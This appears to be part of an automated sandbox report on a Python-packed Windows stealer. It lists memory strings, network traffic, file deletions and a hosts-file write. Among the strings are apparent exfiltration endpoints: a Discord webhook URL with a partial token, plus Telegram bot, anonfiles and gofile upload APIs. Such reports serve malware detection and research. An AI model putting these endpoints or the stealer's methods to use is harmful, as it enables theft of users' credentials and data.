              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000002.2126705796.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: program.exe, 00000001.00000002.2105759928.000001B5FDE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: program.exe, 00000001.00000003.1784927173.000001B5FE301000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2106483905.000001B5FE310000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848103473.000001B5FE301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: program.exe, 00000001.00000003.1850937625.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2002700653.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE2B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: program.exe, 00000001.00000002.2105991946.000001B5FE212000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE212000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: powershell.exe, 00000008.00000002.1906355908.000001A84B996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1FA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B374D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000002.2126705796.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000008.00000002.1917964780.000001A853E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic;
              Source: powershell.exe, 00000008.00000002.1871103876.000001A83BB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000008.00000002.1871103876.000001A83B921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B1DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000008.00000002.1871103876.000001A83BB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: program.exe, 00000001.00000002.2107675447.000001B5FE7A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000002A.00000002.1908908412.000001E9B3434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000002A.00000002.1908908412.000001E9B36F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1991968097.000001E9CA1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707020409.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706688140.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000002.2126705796.000002641A64D000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706286849.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: program.exe, 00000001.00000003.2002700653.000001B5FE1F1000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2103489320.000001B5FE1EA000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1850937625.000001B5FE1ED000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105991946.000001B5FE1F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: program.exe, 00000001.00000002.2110707812.000001B5FF148000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: program.exe, 00000001.00000002.2114614682.000001B5FFA7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 00000008.00000002.1871103876.000001A83B921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908908412.000001E9B1DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE91C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: program.exe, 00000001.00000003.1851652911.000001B5FF209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot0
              Source: program.exe, 00000001.00000002.2107834839.000001B5FE980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: program.exe, 00000001.00000003.2001533642.000001B5FE416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000002A.00000002.1981454462.000001E9C1E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: program.exe, 00000000.00000003.1707556625.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000000.00000003.1707762486.000002641A64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: program.exe, 00000001.00000002.2107318473.000001B5FE680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-
              Source: program.exe, 00000001.00000003.1851652911.000001B5FF209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: program.exe, 00000001.00000003.1713530178.000001B5FDD14000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1718315279.000001B5FDD08000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1713899896.000001B5FDD14000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1714242309.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1718558053.000001B5FDD11000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2105467796.000001B5FDC50000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1725898997.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1714439286.000001B5FDD18000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1727743647.000001B5FDCB7000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1723691817.000001B5FDD15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: program.exe, 00000001.00000002.2105759928.000001B5FDE50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: program.exe, 00000001.00000002.2105086608.000001B5FD810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\Desktop\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\DVWHKMNFNN.docxJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\HTAGVDFUIE.docxJump to behavior
              Source: C:\Users\user\Desktop\program.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\BPMLNOBVSB.mp3Jump to behavior
              Source: C:\Users\user\Desktop\program.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? \Common Files\Desktop\WUTJSCBCFX.pdf
              Source: C:\Users\user\Desktop\program.exe | File written: C:\Windows\System32\drivers\etc\hosts
              Source: cmd.exe | Process created: 62

              System Summary

              Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: 83_2_00007FF64FE73A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: 83_2_00007FF64FE9B57C: GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
              Source: C:\Users\user\Desktop\program.exe | Code function: String function: 00007FF6B7502710 appears 104 times
              Source: C:\Users\user\Desktop\program.exe | Code function: String function: 00007FFE00761325 appears 518 times
              Source: C:\Users\user\Desktop\program.exe | Code function: String function: 00007FFE007DD341 appears 1192 times
              Source: C:\Users\user\Desktop\program.exe | Code function: String function: 00007FFE007DD33B appears 39 times
              Source: C:\Users\user\Desktop\program.exe | Code function: String function: 00007FF6B7502910 appears 34 times
              Source: C:\Users\user\Desktop\program.exe | Code function: String function: 00007FFE007DD32F appears 324 times
              Source: C:\Users\user\Desktop\program.exe | Code function: String function: 00007FFE007DDB03 appears 45 times
              Source: C:\Users\user\Desktop\program.exe | Code function: String function: 00007FFE01309340 appears 80 times
              Source: C:\Users\user\Desktop\program.exe | Code function: String function: 00007FFE0130A500 appears 99 times
              Source: C:\Users\user\Desktop\program.exe | Code function: String function: 00007FFE007DD425 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: String function: 00007FF64FE68444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe | Code function: String function: 00007FF64FE949F4 appears 53 times
              Source: program.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: program.exeBinary or memory string: OriginalFilename vs program.exe
              Source: program.exe, 00000000.00000003.1705401470.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1704155388.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs program.exe
              Source: program.exe, 00000000.00000003.1704988326.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1705192262.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1705283255.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1704360069.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1708318223.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs program.exe
              Source: program.exe, 00000000.00000003.1704487837.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1708160860.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1704607095.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs program.exe
              Source: program.exe, 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs program.exe
              Source: program.exe, 00000000.00000003.1708610018.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1705081700.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs program.exe
              Source: program.exe, 00000000.00000003.1706789669.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs program.exe
              Source: program.exe, 00000000.00000003.1705512770.000002641A640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs program.exe
              Source: program.exe, 00000001.00000002.2119683016.00007FFDFBAB5000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython313.dll. vs program.exe
              Source: program.exe, 00000001.00000002.2118578234.00007FFDFB42A000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs program.exe
              Source: program.exe, 00000001.00000002.2120315849.00007FFE0147C000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs program.exe
              Source: program.exe, 00000001.00000002.2122180293.00007FFE130CC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs program.exe
